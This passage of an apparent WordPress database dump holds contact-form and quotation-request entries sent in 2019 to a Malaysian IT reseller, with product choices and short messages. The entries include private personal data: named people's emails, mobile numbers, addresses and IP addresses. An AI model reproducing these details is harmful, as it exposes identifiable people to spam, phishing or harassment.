Bhd\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:9:\"Cisco PBX\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"12\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-10-29 08:41:57','121.121.118.179','1'),(350,3,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"23\";s:4:\"slug\";s:33:\"get-quotation-panasonic-toughbook\";s:4:\"name\";s:35:\"Get Quotation (PANASONIC TOUGHBOOK)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"27\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:8:\"Kent Lee\";}i:2;a:7:{s:2:\"id\";s:2:\"28\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:23:\"kentlee@galladental.com\";}i:3;a:7:{s:2:\"id\";s:2:\"31\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0122028202\";}i:4;a:7:{s:2:\"id\";s:2:\"29\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:32:\"Galla Dental Corporation Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:2:\"33\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:69:\"40-1, Jalan Rimbunan Raya, Laman Rimbunan Kepong, 52100, Kuala Lumpur\";}i:6;a:7:{s:2:\"id\";s:2:\"32\";s:4:\"slug\";s:19:\"panasonic-toughbook\";s:4:\"name\";s:19:\"PANASONIC TOUGHBOOK\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:379:\"a:14:{i:0;s:12:\"TOUGHBOOK 33\";i:1;s:12:\"TOUGHBOOK 31\";i:2;s:12:\"TOUGHBOOK 54\";i:3;s:12:\"TOUGHBOOK 20\";i:4;s:14:\"TOUGHPAD FZ-Q2\";i:5;s:12:\"TOUGHBOOK T1\";i:6;s:12:\"TOUGHBOOK N1\";i:7;s:14:\"TOUGHPAD FZ-X1\";i:8;s:12:\"TOUGHBOOK L1\";i:9;s:14:\"TOUGHPAD FZ-M1\";i:10;s:14:\"TOUGHPAD FZ-G1\";i:11;s:14:\"TOUGHPAD FZ-A2\";i:12;s:14:\"TOUGHPAD FZ-B2\";i:13;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"TOUGHBOOK 54\";}i:7;a:7:{s:2:\"id\";s:2:\"30\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:8;a:7:{s:2:\"id\";s:2:\"24\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"25\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"24\";s:5:\"value\";s:2:\"12\";}i:10;a:7:{s:2:\"id\";s:2:\"26\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"24\";s:5:\"value\";s:0:\"\";}}','Get Quotation (PANASONIC TOUGHBOOK)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-10-29 08:49:55','175.136.244.109','1'),(351,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:15:\"Mary Wan Mering\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:26:\"marywan@sarawaktourism.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0198589083\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:21:\"Sarawak Tourism Board\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:43:\"Need teleconferencing equipment and systems\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"28\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-10-30 17:47:30','183.171.113.251','1'),(352,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"KISHANA NAND\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:21:\"kdutt@sahuexports.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:11:\"09873099259\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"sahu exports\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:57:\"need zoom software for polycom device we are already used\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"12\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-10-31 18:40:57','119.82.73.42','1'),(353,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:17:\"Ruhaizi Bin Ishak\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:20:\"ruhaizi@axis-tek.com\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0192672964\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:25:\"Axis Technology Resources\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:26:\"Bandar Baru Bangi Selangor\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:15:\"Logitech BCC950\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:29:\"we need quotation 1 unit only\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"10\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-11-04 11:24:21','175.139.143.105','1'),(354,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:11:\"Manibarathy\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:33:\"manibarthy.chinanapan@n2wcorp.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0164146621\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:15:\"N2WCorp SDN BHD\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:62:\"Would like to get quotation for Office 365 Premium for 20 User\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"32\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-11-04 11:58:48','202.168.66.190','1'),(355,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:5:\"FCLEE\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:18:\"fclee@denso.com.my\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0123619050\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:23:\"DENSO(MALAYSIA)Sdn.Bhd.\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:29:\"Lot 2, Jalan P/1, Section 13,\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:196:\"Logitech Connect, Logitech BCC950, Logitech PTZ Pro 2, SMARTDOCK, Logitech Brio, Logitech C9230e, Logitech C925e, Logitech B525, Group Expansion Mics, Logitech SmartDock Flex, MeetUp Expansion Mic\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:18:\"Prefer onsite demo\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"56\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-11-05 11:50:32','203.116.87.162','1'),(356,3,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"23\";s:4:\"slug\";s:33:\"get-quotation-panasonic-toughbook\";s:4:\"name\";s:35:\"Get Quotation (PANASONIC TOUGHBOOK)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"27\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"NG THEAN LIANG\";}i:2;a:7:{s:2:\"id\";s:2:\"28\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:18:\"admin@nbcsb.com.my\";}i:3;a:7:{s:2:\"id\";s:2:\"31\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:11:\"01130188084\";}i:4;a:7:{s:2:\"id\";s:2:\"29\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:23:\"NBC CORPORATION SDN BHD\";}i:5;a:7:{s:2:\"id\";s:2:\"33\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:63:\"26-26A,JALAN RAJAWALI 3,BDR PUCHONG JAYA,47170 PUCHONG,SELANGOR\";}i:6;a:7:{s:2:\"id\";s:2:\"32\";s:4:\"slug\";s:19:\"panasonic-toughbook\";s:4:\"name\";s:19:\"PANASONIC TOUGHBOOK\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:379:\"a:14:{i:0;s:12:\"TOUGHBOOK 33\";i:1;s:12:\"TOUGHBOOK 31\";i:2;s:12:\"TOUGHBOOK 54\";i:3;s:12:\"TOUGHBOOK 20\";i:4;s:14:\"TOUGHPAD FZ-Q2\";i:5;s:12:\"TOUGHBOOK T1\";i:6;s:12:\"TOUGHBOOK N1\";i:7;s:14:\"TOUGHPAD FZ-X1\";i:8;s:12:\"TOUGHBOOK L1\";i:9;s:14:\"TOUGHPAD FZ-M1\";i:10;s:14:\"TOUGHPAD FZ-G1\";i:11;s:14:\"TOUGHPAD FZ-A2\";i:12;s:14:\"TOUGHPAD FZ-B2\";i:13;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"TOUGHBOOK 54\";}i:7;a:7:{s:2:\"id\";s:2:\"30\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:64:\"PLEASE QUOTE TOUGHBOOK 54CF (I7,WINDOW 10,4GB RAM,500GB STORAGE)\";}i:8;a:7:{s:2:\"id\";s:2:\"24\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"25\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"24\";s:5:\"value\";s:2:\"32\";}i:10;a:7:{s:2:\"id\";s:2:\"26\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"24\";s:5:\"value\";s:0:\"\";}}','Get Quotation (PANASONIC TOUGHBOOK)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-11-05 13:25:15','175.138.214.59','1'),(357,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"LOH CHUN KIT\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:23:\"chunkit.loh@sp-inno.com\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0192133890\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:28:\"splendour innovation sdn 